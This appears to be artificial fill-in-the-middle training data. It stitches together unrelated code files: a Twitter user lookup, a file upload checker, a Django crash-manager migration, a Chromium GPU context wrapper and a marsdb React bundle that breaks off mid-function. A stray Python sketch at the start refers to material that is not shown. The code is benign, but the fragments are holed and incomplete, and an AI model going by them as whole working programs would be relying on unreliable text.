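The mobservable record above guards lazy recomputation with an isComputing flag so that re-entrant evaluation is reported as a cycle. A minimal Python sketch of that guard pattern — the class name and fields are illustrative:

class Computed:
    def __init__(self, func):
        self._func = func
        self._computing = False  # re-entrancy guard, like isComputing above
        self._dirty = True
        self._value = None

    def get(self):
        # Re-entering get() while the function is still computing
        # means the value depends on itself: a cycle.
        if self._computing:
            raise RuntimeError("Cycle detected")
        if self._dirty:
            self._computing = True
            try:
                self._value = self._func()
                self._dirty = False
            finally:
                self._computing = False
        return self._value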
<|file_name|>functions.py<|end_file_name|><|fim▁begin|># twitter/functions.py # Brought to you by We Vote. Be good. # -*- coding: UTF-8 -*- import tweepy import wevote_functions.admin from config.base import get_environment_variable from exception.models import handle_exception from wevote_functions.functions import positive_value_exists logger = wevote_functions.admin.get_logger(__name__) WE_VOTE_SERVER_ROOT_URL = get_environment_variable("WE_VOTE_SERVER_ROOT_URL") TWITTER_CONSUMER_KEY = get_environment_variable("TWITTER_CONSUMER_KEY") TWITTER_CONSUMER_SECRET = get_environment_variable("TWITTER_CONSUMER_SECRET") TWITTER_ACCESS_TOKEN = get_environment_variable("TWITTER_ACCESS_TOKEN") TWITTER_ACCESS_TOKEN_SECRET = get_environment_variable("TWITTER_ACCESS_TOKEN_SECRET") TWITTER_USER_NOT_FOUND_LOG_RESPONSES = [ "{'code': 50, 'message': 'User not found.'}", "User not found." ] TWITTER_USER_SUSPENDED_LOG_RESPONSES = [ "{'code': 63, 'message': 'User has been suspended.'}", "User has been suspended." ] def retrieve_twitter_user_info(twitter_user_id, twitter_handle=''): status = "" success = True twitter_user_not_found_in_twitter = False twitter_user_suspended_by_twitter = False write_to_server_logs = False # December 2021: Using the Twitter 1.1 API for OAuthHandler, since all other 2.0 apis that we need are not # yet available. # client = tweepy.Client( # consumer_key=TWITTER_CONSUMER_KEY, # consumer_secret=TWITTER_CONSUMER_SECRET, # access_token=TWITTER_ACCESS_TOKEN, # access_token_secret=TWITTER_ACCESS_TOKEN_SECRET) auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET) auth.set_access_token(TWITTER_ACCESS_TOKEN, TWITTER_ACCESS_TOKEN_SECRET) api = tweepy.API(auth, timeout=10) # Strip out the twitter handles "False" or "None" if twitter_handle is False: twitter_handle = '' elif twitter_handle is None: twitter_handle = '' elif twitter_handle: twitter_handle_lower = twitter_handle.lower() if twitter_handle_lower == 'false' or twitter_handle_lower == 'none': twitter_handle = '' twitter_handle_found = False twitter_json = {} from wevote_functions.functions import convert_to_int twitter_user_id = convert_to_int(twitter_user_id) try: if positive_value_exists(twitter_handle): twitter_user = api.get_user(screen_name=twitter_handle) twitter_json = twitter_user._json success = True # status += 'TWITTER_HANDLE_SUCCESS-' + str(twitter_handle) + " " twitter_handle_found = True twitter_user_id = twitter_user.id # Integer value. 
id_str would be the String value elif positive_value_exists(twitter_user_id): twitter_user = api.get_user(user_id=twitter_user_id) twitter_json = twitter_user._json success = True # status += 'TWITTER_USER_ID_SUCCESS-' + str(twitter_user_id) + " " twitter_handle_found = True else: twitter_json = {} success = False status += 'TWITTER_RETRIEVE_NOT_SUCCESSFUL-MISSING_VARIABLE ' twitter_handle_found = False except tweepy.TooManyRequests as rate_limit_error: success = False status += 'TWITTER_RATE_LIMIT_ERROR: ' + str(rate_limit_error) + " " handle_exception(rate_limit_error, logger=logger, exception_message=status)<|fim▁hole|> except tweepy.errors.HTTPException as error_instance: success = False status += 'TWITTER_HTTP_ERROR ' handle_exception(error_instance, logger=logger, exception_message=status) except tweepy.errors.TweepyException as error_instance: success = False status += "[TWEEP_ERROR: " status += twitter_handle + " " if positive_value_exists(twitter_handle) else "" status += str(twitter_user_id) + " " if positive_value_exists(twitter_user_id) else " " if error_instance: status += str(error_instance) + " " if error_instance and hasattr(error_instance, 'args'): try: error_tuple = error_instance.args for error_dict in error_tuple: for one_error in error_dict: status += '[' + one_error['message'] + '] ' if one_error['message'] in TWITTER_USER_NOT_FOUND_LOG_RESPONSES: twitter_user_not_found_in_twitter = True elif one_error['message'] in TWITTER_USER_SUSPENDED_LOG_RESPONSES: twitter_user_suspended_by_twitter = True else: write_to_server_logs = True except Exception as e: status += "PROBLEM_PARSING_TWEEPY_ERROR: " + str(e) + " " write_to_server_logs = True else: write_to_server_logs = True status += "]" if write_to_server_logs: handle_exception(error_instance, logger=logger, exception_message=status) except Exception as e: success = False status += "TWEEPY_EXCEPTION: " + str(e) + " " handle_exception(e, logger=logger, exception_message=status) try: if positive_value_exists(twitter_json.get('profile_banner_url')): # Dec 2019, https://developer.twitter.com/en/docs/accounts-and-users/user-profile-images-and-banners banner = twitter_json.get('profile_banner_url') + '/1500x500' twitter_json['profile_banner_url'] = banner except Exception as e: status += "FAILED_PROFILE_BANNER_URL: " + str(e) + " " results = { 'status': status, 'success': success, 'twitter_handle': twitter_handle, 'twitter_handle_found': twitter_handle_found, 'twitter_json': twitter_json, 'twitter_user_id': twitter_user_id, 'twitter_user_not_found_in_twitter': twitter_user_not_found_in_twitter, 'twitter_user_suspended_by_twitter': twitter_user_suspended_by_twitter, } return results<|fim▁end|>
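The We Vote record above digs through tweepy's nested exception args to recognise "not found" and "suspended" accounts. A toy Python stand-in for that classification, with a fabricated payload shape that mimics the error_tuple/error_dict nesting in the record (the constants mirror the module's own lists):

NOT_FOUND = {"User not found.", "{'code': 50, 'message': 'User not found.'}"}
SUSPENDED = {"User has been suspended.", "{'code': 63, 'message': 'User has been suspended.'}"}

def classify_twitter_error(error_args):
    # error_args stands in for error_instance.args: a tuple of
    # iterables of dicts carrying a 'message' key.
    not_found = suspended = False
    for error_list in error_args:
        for one_error in error_list:
            msg = one_error.get("message", "")
            if msg in NOT_FOUND:
                not_found = True
            elif msg in SUSPENDED:
                suspended = True
    return not_found, suspended

print(classify_twitter_error(([{"message": "User not found."}],)))  # (True, False)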
<|file_name|>checkFile.ts<|end_file_name|><|fim▁begin|>const fileTypeExts = { pdf: ['pdf'], image: ['jpg', 'jpeg', 'png'], pdfImage: ['pdf', 'jpg', 'jpeg', 'png'], }; const fileTypeAlerts = { pdf: 'Please choose a pdf document', image: 'Please choose an image file', pdfImage: 'Please choose a pdf document or image file', }; export default function checkFile(inputFiles, value, maxKb, fileType) { if ( (window as any).FileReader && inputFiles &&<|fim▁hole|> ) { alert(`The max file size is ${(maxKb || 500) / 1000}MB, please try again.`); return false; } const ext = value .split('.') .pop() .toLowerCase(); if (fileTypeExts[fileType] && !fileTypeExts[fileType].includes(ext)) { alert(fileTypeAlerts[fileType]); return false; } return true; }<|fim▁end|>
inputFiles[0] && inputFiles[0].size > (maxKb || 500) * 1000
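checkFile.ts above gates uploads on size first, then on extension per file type. The same two checks in a short Python sketch — the function name and return shape are illustrative:

ALLOWED_EXTS = {
    "pdf": {"pdf"},
    "image": {"jpg", "jpeg", "png"},
    "pdfImage": {"pdf", "jpg", "jpeg", "png"},
}

def check_file(filename, size_bytes, file_type, max_kb=500):
    # Reject files over the size budget (maxKb defaults to 500,
    # compared in decimal kilobytes as in the TypeScript record).
    if size_bytes > max_kb * 1000:
        return False, "file too large"
    # Then reject extensions not allowed for this file type.
    ext = filename.rsplit(".", 1)[-1].lower()
    if file_type in ALLOWED_EXTS and ext not in ALLOWED_EXTS[file_type]:
        return False, "wrong file type"
    return True, "ok"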
<|file_name|>2PopDNAnorec_1_76.js<|end_file_name|><|fim▁begin|>USETEXTLINKS = 1 STARTALLOPEN = 0 WRAPTEXT = 1 PRESERVESTATE = 0 HIGHLIGHT = 1 ICONPATH = 'file:////Users/eric/github/popgenDB/sims_for_structure_paper/2PopDNAnorec_0.5_1000/' //change if the gif's folder is a subfolder, for example: 'images/' foldersTree = gFld("<i>ARLEQUIN RESULTS (2PopDNAnorec_1_76.arp)</i>", "") insDoc(foldersTree, gLnk("R", "Arlequin log file", "Arlequin_log.txt")) aux1 = insFld(foldersTree, gFld("Run of 31/07/18 at 17:02:31", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31"))<|fim▁hole|> insDoc(aux2, gLnk("R", "AMOVA", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31_pop_amova")) insDoc(aux2, gLnk("R", "Pairwise distances", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31_pop_pairw_diff"))<|fim▁end|>
insDoc(aux1, gLnk("R", "Settings", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31_run_information")) aux2 = insFld(aux1, gFld("Genetic structure (samp=pop)", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31_pop_gen_struct"))
<|file_name|>0001_squashed_0020_add_app_permissions.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Generated by Django 1.11.20 on 2019-12-09 00:06 from __future__ import unicode_literals from django.conf import settings import django.core.files.storage from django.db import migrations, models import django.db.migrations.operations.special import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): replaces = [ ("crashmanager", "0001_initial"), ("crashmanager", "0002_bugzillatemplate_security"), ("crashmanager", "0003_bucket_frequent"), ("crashmanager", "0004_add_tool"), ("crashmanager", "0005_add_user"), ("crashmanager", "0006_user_defaultproviderid"), ("crashmanager", "0007_bugzillatemplate_comment"), ("crashmanager", "0008_crashentry_crashaddressnumeric"), ("crashmanager", "0009_copy_crashaddress"), ("crashmanager", "0010_bugzillatemplate_security_group"), ("crashmanager", "0011_bucket_permanent"), ("crashmanager", "0012_crashentry_cachedcrashinfo"), ("crashmanager", "0013_init_cachedcrashinfo"), ("crashmanager", "0014_bugzillatemplate_testcase_filename"), ("crashmanager", "0015_crashentry_triagedonce"), ("crashmanager", "0016_auto_20160308_1500"), ("crashmanager", "0017_user_restricted"), ("crashmanager", "0018_auto_20170620_1503"), ("crashmanager", "0019_bucket_optimizedsignature"), ("crashmanager", "0020_add_app_permissions"), ] initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name="Bucket", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("signature", models.TextField()), ("shortDescription", models.CharField(blank=True, max_length=1023)), ], ), migrations.CreateModel( name="Bug", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("externalId", models.CharField(blank=True, max_length=255)), ("closed", models.DateTimeField(blank=True, null=True)), ], ), migrations.CreateModel( name="BugProvider", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("classname", models.CharField(max_length=255)), ("hostname", models.CharField(max_length=255)), ("urlTemplate", models.CharField(max_length=1023)), ], ), migrations.CreateModel( name="BugzillaTemplate", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.TextField()), ("product", models.TextField()), ("component", models.TextField()), ("summary", models.TextField(blank=True)), ("version", models.TextField()), ("description", models.TextField(blank=True)), ("whiteboard", models.TextField(blank=True)), ("keywords", models.TextField(blank=True)), ("op_sys", models.TextField(blank=True)), ("platform", models.TextField(blank=True)), ("priority", models.TextField(blank=True)), ("severity", models.TextField(blank=True)), ("alias", models.TextField(blank=True)), ("cc", models.TextField(blank=True)), ("assigned_to", models.TextField(blank=True)), ("qa_contact", models.TextField(blank=True)), ("target_milestone", models.TextField(blank=True)), ("attrs", models.TextField(blank=True)), ("security", models.BooleanField(default=False)), ], ), migrations.CreateModel( name="Client", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=255)), ], ), 
migrations.CreateModel( name="CrashEntry", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("created", models.DateTimeField(default=django.utils.timezone.now)), ("rawStdout", models.TextField(blank=True)), ("rawStderr", models.TextField(blank=True)), ("rawCrashData", models.TextField(blank=True)), ("metadata", models.TextField(blank=True)), ("env", models.TextField(blank=True)), ("args", models.TextField(blank=True)), ("crashAddress", models.CharField(blank=True, max_length=255)), ("shortSignature", models.CharField(blank=True, max_length=255)), ( "bucket", models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Bucket", ), ), ( "client", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Client", ), ), ], ), migrations.CreateModel( name="OS", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=63)), ("version", models.CharField(blank=True, max_length=127, null=True)), ], ), migrations.CreateModel( name="Platform", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=63)), ], ), migrations.CreateModel( name="Product", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=63)), ("version", models.CharField(blank=True, max_length=127, null=True)), ], ), migrations.CreateModel( name="TestCase", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ( "test", models.FileField( storage=django.core.files.storage.FileSystemStorage( location=None ), upload_to=b"tests", ), ), ("size", models.IntegerField(default=0)), ("quality", models.IntegerField(default=0)), ("isBinary", models.BooleanField(default=False)), ], ), migrations.AddField( model_name="crashentry", name="os", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.OS" ), ), migrations.AddField( model_name="crashentry", name="platform", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Platform" ), ), migrations.AddField( model_name="crashentry", name="product", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Product" ), ), migrations.AddField( model_name="crashentry", name="testcase", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to="crashmanager.TestCase", ), ), migrations.AddField( model_name="bug", name="externalType", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.BugProvider", ), ), migrations.AddField( model_name="bucket", name="bug", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Bug", ), ), migrations.AddField( model_name="bucket", name="frequent", field=models.BooleanField(default=False), ), migrations.CreateModel( name="Tool", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=63)), ], ), migrations.CreateModel( name="User", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("defaultTemplateId", 
models.IntegerField(default=0)), ("defaultToolsFilter", models.ManyToManyField(to="crashmanager.Tool")), ( "user", models.OneToOneField( on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, ), ), ("defaultProviderId", models.IntegerField(default=1)), ], ), migrations.AddField( model_name="crashentry", name="tool", field=models.ForeignKey( default=1, on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Tool", ), preserve_default=False, ), migrations.AddField( model_name="bugzillatemplate",<|fim▁hole|> migrations.AddField( model_name="crashentry", name="crashAddressNumeric", field=models.BigIntegerField(blank=True, null=True), ), migrations.AddField( model_name="bugzillatemplate", name="security_group", field=models.TextField(blank=True, default=""), preserve_default=False, ), migrations.AddField( model_name="bucket", name="permanent", field=models.BooleanField(default=False), ), migrations.AddField( model_name="crashentry", name="cachedCrashInfo", field=models.TextField(blank=True, null=True), ), migrations.AddField( model_name="bugzillatemplate", name="testcase_filename", field=models.TextField(blank=True, default=""), preserve_default=False, ), migrations.AddField( model_name="crashentry", name="triagedOnce", field=models.BooleanField(default=False), ), migrations.AddField( model_name="user", name="restricted", field=models.BooleanField(default=False), ), migrations.CreateModel( name="BucketWatch", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("lastCrash", models.IntegerField(default=0)), ( "bucket", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Bucket", ), ), ( "user", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.User", ), ), ], ), migrations.AddField( model_name="user", name="bucketsWatching", field=models.ManyToManyField( through="crashmanager.BucketWatch", to="crashmanager.Bucket" ), ), migrations.AddField( model_name="bucket", name="optimizedSignature", field=models.TextField(blank=True, null=True), ), migrations.AlterModelOptions( name="user", options={ "permissions": ( ("view_crashmanager", "Can see CrashManager app"), ("view_covmanager", "Can see CovManager app"), ("view_ec2spotmanager", "Can see EC2SpotManager app"), ) }, ), ]<|fim▁end|>
name="comment", field=models.TextField(blank=True, default=""), preserve_default=False, ),
<|file_name|>grcontext_for_webgraphicscontext3d.cc<|end_file_name|><|fim▁begin|>// Copyright (c) 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "webkit/common/gpu/grcontext_for_webgraphicscontext3d.h" #include "third_party/WebKit/public/platform/WebGraphicsContext3D.h" #include "third_party/skia/include/gpu/GrContext.h" #include "third_party/skia/include/gpu/gl/GrGLInterface.h" namespace webkit { namespace gpu { static void BindWebGraphicsContext3DGLContextCallback( const GrGLInterface* interface) { reinterpret_cast<WebKit::WebGraphicsContext3D*>( interface->fCallbackData)->makeContextCurrent(); } GrContextForWebGraphicsContext3D::GrContextForWebGraphicsContext3D( WebKit::WebGraphicsContext3D* context3d) { if (!context3d) return; skia::RefPtr<GrGLInterface> interface = skia::AdoptRef( context3d->createGrGLInterface()); if (!interface) return; interface->fCallback = BindWebGraphicsContext3DGLContextCallback; interface->fCallbackData = reinterpret_cast<GrGLInterfaceCallbackData>(context3d); gr_context_ = skia::AdoptRef(GrContext::Create( kOpenGL_GrBackend, reinterpret_cast<GrBackendContext>(interface.get()))); if (!gr_context_) return; bool nonzero_allocation = true; SetMemoryLimit(nonzero_allocation); } GrContextForWebGraphicsContext3D::~GrContextForWebGraphicsContext3D() { if (gr_context_) gr_context_->contextDestroyed(); } void GrContextForWebGraphicsContext3D::SetMemoryLimit(bool nonzero_allocation) { if (!gr_context_) return;<|fim▁hole|> if (nonzero_allocation) { // The limit of the number of textures we hold in the GrContext's // bitmap->texture cache. static const int kMaxGaneshTextureCacheCount = 2048; // The limit of the bytes allocated toward textures in the GrContext's // bitmap->texture cache. static const size_t kMaxGaneshTextureCacheBytes = 96 * 1024 * 1024; gr_context_->setTextureCacheLimits( kMaxGaneshTextureCacheCount, kMaxGaneshTextureCacheBytes); } else { gr_context_->freeGpuResources(); gr_context_->setTextureCacheLimits(0, 0); } } } // namespace gpu } // namespace webkit<|fim▁end|>
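The Chromium record above toggles Ganesh texture-cache budgets between real limits and zero depending on whether the context holds a nonzero allocation. A small Python sketch of that toggle — the class and method names are illustrative:

class TextureCache:
    MAX_COUNT = 2048                  # cache entry budget, as above
    MAX_BYTES = 96 * 1024 * 1024      # byte budget, as above

    def __init__(self):
        self.entries = []
        self.count_limit = 0
        self.byte_limit = 0

    def set_memory_limit(self, nonzero_allocation):
        if nonzero_allocation:
            self.count_limit = self.MAX_COUNT
            self.byte_limit = self.MAX_BYTES
        else:
            # Mirror freeGpuResources() plus zeroed limits.
            self.entries.clear()
            self.count_limit = 0
            self.byte_limit = 0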
<|file_name|>marsdb.react.js<|end_file_name|><|fim▁begin|>(function(f){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=f()}else if(typeof define==="function"&&define.amd){define([],f)}else{var g;if(typeof window!=="undefined"){g=window}else if(typeof global!=="undefined"){g=global}else if(typeof self!=="undefined"){g=self}else{g=this}(g.Mars || (g.Mars = {})).React = f()}})(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var _react = require('react'); var _react2 = _interopRequireDefault(_react); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } } function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; } function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? 
Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; } /** * Component for rendering data container */ var DataManagerContainer = function (_React$Component) { _inherits(DataManagerContainer, _React$Component); function DataManagerContainer(props, context) { _classCallCheck(this, DataManagerContainer); var _this = _possibleConstructorReturn(this, Object.getPrototypeOf(DataManagerContainer).call(this, props, context)); _this.state = { result: {} }; _this.query = props.component.getQuery(props.variables); _this.query.on('update', _this._handleDataChanges.bind(_this)); _this._executeQuery(); return _this; } _createClass(DataManagerContainer, [{ key: '_executeQuery', value: function _executeQuery() { var _this2 = this; this._resolved = false; this.query.execute().then(function (result) { _this2._resolved = true; _this2.setState({ result: result }); }); } }, { key: '_handleDataChanges', value: function _handleDataChanges(result) { if (this._resolved) { this.setState({ result: result }); } } }, { key: 'componentWillUnmount', value: function componentWillUnmount() { this.query.stop(); } }, { key: 'componentWillReceiveProps', value: function componentWillReceiveProps(nextProps) { this.query.updateVariables(nextProps); } }, { key: 'renderLoading', value: function renderLoading() { return this.props.renderLoading(); } }, { key: 'render', value: function render() { var Component = this.props.component; // eslint-disable-line return this._resolved ? _react2.default.createElement(Component, _extends({}, this.props, this.state.result)) : this.renderLoading(); } }]); return DataManagerContainer; }(_react2.default.Component); DataManagerContainer.defaultProps = { renderLoading: function renderLoading() { return null; } }; exports.default = DataManagerContainer; },{"react":undefined}],2:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var _forEach = require('fast.js/forEach'); var _forEach2 = _interopRequireDefault(_forEach); var _map2 = require('fast.js/map'); var _map3 = _interopRequireDefault(_map2); var _keys2 = require('fast.js/object/keys'); var _keys3 = _interopRequireDefault(_keys2); var _marsdb = require('marsdb'); var _invariant = require('invariant'); var _invariant2 = _interopRequireDefault(_invariant); var _utils = require('./utils'); var utils = _interopRequireWildcard(_utils); function _interopRequireWildcard(obj) { if (obj && obj.__esModule) { return obj; } else { var newObj = {}; if (obj != null) { for (var key in obj) { if (Object.prototype.hasOwnProperty.call(obj, key)) newObj[key] = obj[key]; } } newObj.default = obj; return newObj; } } function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

/**
 * ExecutionContext is used to track changes of variables
 * and cursors and cleanup listeners on parent cursor changes.
 * It also provides a method to run a function "in context":
 * while the function is running, `ExecutionContext.getCurrentContext()`
 * returns the context.
 */

var ExecutionContext = function (_EventEmitter) {
  _inherits(ExecutionContext, _EventEmitter);

  function ExecutionContext() {
    var variables = arguments.length <= 0 || arguments[0] === undefined ? new Map() : arguments[0];

    _classCallCheck(this, ExecutionContext);

    var _this = _possibleConstructorReturn(this, Object.getPrototypeOf(ExecutionContext).call(this));

    _this.variables = variables;
    _this.emitCleanup = _this.emitCleanup.bind(_this);
    return _this;
  }

  /**
   * Adds a cleanup event listener and returns a function
   * for removing the listener.
   * @param {Function} fn
   * @return {Function}
   */

  _createClass(ExecutionContext, [{
    key: 'addCleanupListener',
    value: function addCleanupListener(fn) {
      var _this2 = this;

      this.on('cleanup', fn);
      return function () {
        return _this2.removeListener('cleanup', fn);
      };
    }

    /**
     * Emits the cleanup event. The given argument indicates the source
     * of the event. If it is `false`, then the event will be
     * interpreted as "came from an upper context".
     * @param {Boolean} isRoot
     */

  }, {
    key: 'emitCleanup',
    value: function emitCleanup() {
      var isRoot = arguments.length <= 0 || arguments[0] === undefined ? true : arguments[0];

      this.emit('cleanup', isRoot);
    }

    /**
     * Creates a child context that has the same map of variables.
     * Sets a context cleanup listener for propagating the event to the child.
     * Returns the child context object.
     * @return {ExecutionContext}
     */

  }, {
    key: 'createChildContext',
    value: function createChildContext() {
      var newContext = new ExecutionContext(this.variables);
      var stopper = this.addCleanupListener(function (isRoot) {
        newContext.emitCleanup(false);
        if (!isRoot) {
          stopper();
        }
      });
      return newContext;
    }

    /**
     * Executes the given function "in context": sets the context
     * as globally active, saving the previous active context,
     * and executes the function. While the function is executing,
     * `ExecutionContext.getCurrentContext()` will return the context.
     * At the end of the execution it puts the previous context back.
     * @param {Function} fn
     */

  }, {
    key: 'withinContext',
    value: function withinContext(fn) {
      var prevContext = ExecutionContext.getCurrentContext();
      ExecutionContext.__currentContext = this;
      try {
        return fn();
      } finally {
        ExecutionContext.__currentContext = prevContext;
      }
    }

    /**
     * By the given container class, gets variables from
     * the context and merges them with the given initial values
     * and variables mapping.
     * Returns the result of the merge.
     * @param {Class} containerClass
     * @param {Object} initVars
     * @param {Object} mapVars
     * @return {Object}
     */

  }, {
    key: 'getVariables',
    value: function getVariables(containerClass) {
      var initVars = arguments.length <= 1 || arguments[1] === undefined ? {} : arguments[1];
      var mapVars = arguments.length <= 2 || arguments[2] === undefined ? {} : arguments[2];
      var prepareVariables = arguments.length <= 3 || arguments[3] === undefined ? null : arguments[3];

      var contextVars = this.variables.get(containerClass);

      if (!contextVars) {
        contextVars = {};
        this.variables.set(containerClass, contextVars);
      }

      for (var k in initVars) {
        if (contextVars[k] === undefined) {
          if (mapVars[k] !== undefined) {
            (0, _invariant2.default)(utils._isProperty(mapVars[k]), 'You can pass to a mapping only parent variables');
            contextVars[k] = mapVars[k];
          } else {
            contextVars[k] = utils._createProperty(initVars[k]);
          }
        }
      }

      if (prepareVariables && !contextVars.promise) {
        Object.defineProperty(contextVars, 'promise', {
          value: Promise.resolve(prepareVariables(contextVars)),
          configurable: true
        });
      }

      return contextVars;
    }

    /**
     * Tracks changes of the given variables and regenerates the value
     * on change. It also listens to the context cleanup event
     * to stop the variable change listeners.
     * @param {Property} prop
     * @param {Object} vars
     * @param {Function} valueGenerator
     */

  }, {
    key: 'trackVariablesChange',
    value: function trackVariablesChange(prop, vars, valueGenerator) {
      var _this3 = this;

      var updater = function updater() {
        _this3.emitCleanup();
        if (prop.promise && prop.promise.stop) {
          prop.promise.stop();
        }

        var nextValue = _this3.withinContext(function () {
          return valueGenerator(vars);
        });

        if (utils._isCursor(nextValue)) {
          _this3.trackCursorChange(prop, nextValue);
          prop.emitChange();
        } else if (!utils._isProperty(nextValue)) {
          prop(nextValue);
        } else {
          // Variables tracking must be used only when valueGenerator
          // returns a Cursor or any type except Property.
          throw new Error('Next value can\'t be a property');
        }
      };

      var varTrackers = (0, _map3.default)((0, _keys3.default)(vars), function (k) {
        return vars[k].addChangeListener(updater);
      });

      var stopper = this.addCleanupListener(function (isRoot) {
        if (!isRoot) {
          (0, _forEach2.default)(varTrackers, function (stop) {
            return stop();
          });
          stopper();
        }
      });
    }

    /**
     * Observes the given cursor for changes and sets the new
     * result in the given property.
     * Also tracks the context
     * cleanup event to stop the observers.
     * @param {Property} prop
     * @param {Cursor} cursor
     */

  }, {
    key: 'trackCursorChange',
    value: function trackCursorChange(prop, cursor) {
      var _this4 = this;

      if (prop.removeCursorTracker) {
        prop.removeCursorTracker();
      }

      var observer = function observer(result) {
        if (Array.isArray(result)) {
          result = (0, _map3.default)(result, function (x) {
            return utils._createPropertyWithContext(x, _this4);
          });
        }
        prop(result);
      };

      cursor.on('cursorChanged', this.emitCleanup);
      prop.promise = cursor.observe(observer);
      prop.removeCursorTracker = function () {
        cursor.removeListener('cursorChanged', _this4.emitCleanup);
        prop.promise.stop();
      };

      var stopper = this.addCleanupListener(function (isRoot) {
        if (!isRoot) {
